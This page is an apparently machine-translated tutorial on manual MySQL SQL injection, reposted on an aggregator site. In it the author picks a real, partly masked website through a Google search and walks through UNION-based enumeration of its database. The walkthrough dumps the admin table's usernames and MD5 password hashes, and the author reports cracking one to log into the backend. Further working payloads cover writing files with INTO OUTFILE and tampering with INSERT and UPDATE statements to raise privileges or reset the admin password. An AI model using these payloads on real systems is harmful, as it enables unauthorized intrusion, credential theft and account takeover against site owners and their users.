SQL injection collation used in MySQL

Source: Internet
Author: User
Tags md5 mysql version sql injection

The latest in the study of SQL manual injection, took a website to open the brush. The first is to find a SQL injection point, go to Google to find a random inurl:php?id=

There is a SQL injection point http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228 the link.

The first step is to carry out the injection test. The easiest way to do this is to add and 1=1 to the link and 1=2 if the page is not normal in and 1=2, and if it appears normal under and 1=2, the link has an injection point. The principle is: the statement of the general query is

SELECT * FROM table where id=1

That's what this test is for.

SELECT * FROM table where id=1 and 1=2


Second step, after you find the injection point, guess the number of fields in the current page

Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 6</pre>
<pre escaped= "true" >http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+order by 7</pre>
<pre escaped= "true" >
Order by 6 displays correctly; Order 7 is not displayed correctly. Description field number is 6
Step three, burst the display bit of the current link

The corresponding number is the display position, showing a bit of 2 and 4</pre>
<pre escaped= "true" >http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,4,5,6 –-</pre>
<pre escaped= "true" >
The fourth step, burst the basic information of the database.
Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228+and+1=2+union+select+1,2,3,concat (User (), 0x20,database (), 0x20,version ()), 5,6–-
User: People@localhost Database name: People version: 5.0.20a-log
All databases are burst:

Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (distinct+ Table_schema), 5,6+from+information_schema.columns--
Burst database name: information_schema,people,test

The INFORMATION_SCHEMA database was created after version 5.0 of MySQL, a virtual database that does not physically exist. The Nformation_schema database is similar to the "Data Dictionary", which provides access to database metadata in the form of data. such as database name or table name, column type, access rights (more granular access). INFORMATION_SCHEMA is a database of database metadata. It stores MySQL's database basic information. and change at any time. Used as an important information provider when viewing information and system decisions.
MySQL version 5.0 and above, we use the INFORMATION_SCHEMA database, to obtain information on other databases. Using the Group_concat () function, the distinct parameter plays a role in removing the repeated display.
The fifth part, according to the database table to burst all database table name:
Http://rsc.XXXx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (distinct+table_name), 5,6 +from+information_schema.tables+where+table_schema=database ()--

Admin1,answer,check,class,news,system,zhaoping
The page is news.php its database table must be the news table,
The sixth step, burst admin1 the field, then burst the user information, login backstage
The result of the Hex (16) of the admin1 is: 0x61646d696e31
Burst all the fields:
Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (distinct+ column_name), 5,6+from+information_schema.columns+where+table_name=0x61646d696e31--

Field: Id,admin,password,rank

And then burst the values in Admin and password:

Http://rsc.xxxx.jx.cn/public/dongtai/news.php?id=228%20and%201=2+union+select+1,2,3,group_concat (Distinct+id, 0x2b,admin,0x2b,password,0x2b,rank), 5,6+from+admin1--

1+admin+e10adc3949ba59abbe56e057f20f883e+0,
2+87046609+e10adc3949ba59abbe56e057f20f883e+1,
3+87046607+14a026642666897df2fcdcfe821af855+2,
4+87046608+e10adc3949ba59abbe56e057f20f883e+3,
5+87046605+9511364ffd98d4ac7fa9a4804b0e5669+4,
6+87046610+e10adc3949ba59abbe56e057f20f883e+5,
7+87046606+c11948f135f946ff173ca9b5d88465ca+6

The admin password MD5 decrypted to 123456,
It's OK.


This table queries:
[Url=]http://localhost/injection/user.php?username=angel ' [/url] and LENGTH (password) = ' 6
[Url=]http://localhost/injection/user.php?username=angel ' [/url] and left (password,1) = ' m

Union UNION statement:
[url=]http://localhost/injection/show.php?id=1 ' [/url] Union select 1,username,password from user/*
[url=]http://localhost/injection/show.php?id= ' [/url] Union select 1,username,password from user/*

Export File:
[Url=]http://localhost/injection/user.php?username=angel ' [/url] into outfile ' c:/file.txt
[url=]http://localhost/injection/user.php?username= ' [/url] or 1=1 into outfile ' C:/file.txt
[url=]http://localhost/injection/show.php?id= ' [/url] Union select 1,username,password from user into outfile ' c:/ User.txt

Insert statement:
Insert into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' $username ', ' $password ', ' $homepage ', ' 1 ');
Constructed homepage values are: [url=]http://4ngel.net ' [/url], ' 3 ') #
The SQL statement becomes: Insert into ' user ' (userid, username, password, homepage, userlevel) VALUES (', ' Angel ', ' mypass ', ' Http://4ngel '). Net ', ' 3 ') # ', ' 1 ');

UPDATE statement:
Understand this SQL first
Update user SET password= ' MD5 ($password) ', homepage= ' $homepage ' Where id= ' $id '
If this SQL is modified to the following form, the injection is implemented

1: Modify the homepage value to
[url=]http://4ngel.net ' [/url], userlevel= ' 3
The SQL statement then becomes
Update user SET password= ' mypass ', homepage= ' http://4ngel.net ', userlevel= ' 3 ' Where id= ' $id '
Userlevel for User Level

2: Modify the password value to
Mypass) ' Where username= ' admin ' #
The SQL statement then becomes
Update user SET password= ' MD5 (mypass) ' where username= ' admin ' #) ', homepage= ' $homepage ' where id= ' $id '

3: Modify ID value to
' or username= ' admin '
The SQL statement then becomes
Update user SET password= ' MD5 ($password) ', homepage= ' $homepage ' Where id= ' or username= ' admin '


Common MySQL built-in functions
DATABASE ()
USER ()
System_user ()
Session_user ()
Current_User ()
Database ()
Version ()
SUBSTRING ()
MID ()
CHAR ()
Load_file ()

Summary, for injection is the simplest and most error-prone, for the novice a lot of data is not filtered, for advanced may be server or logic problems.

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.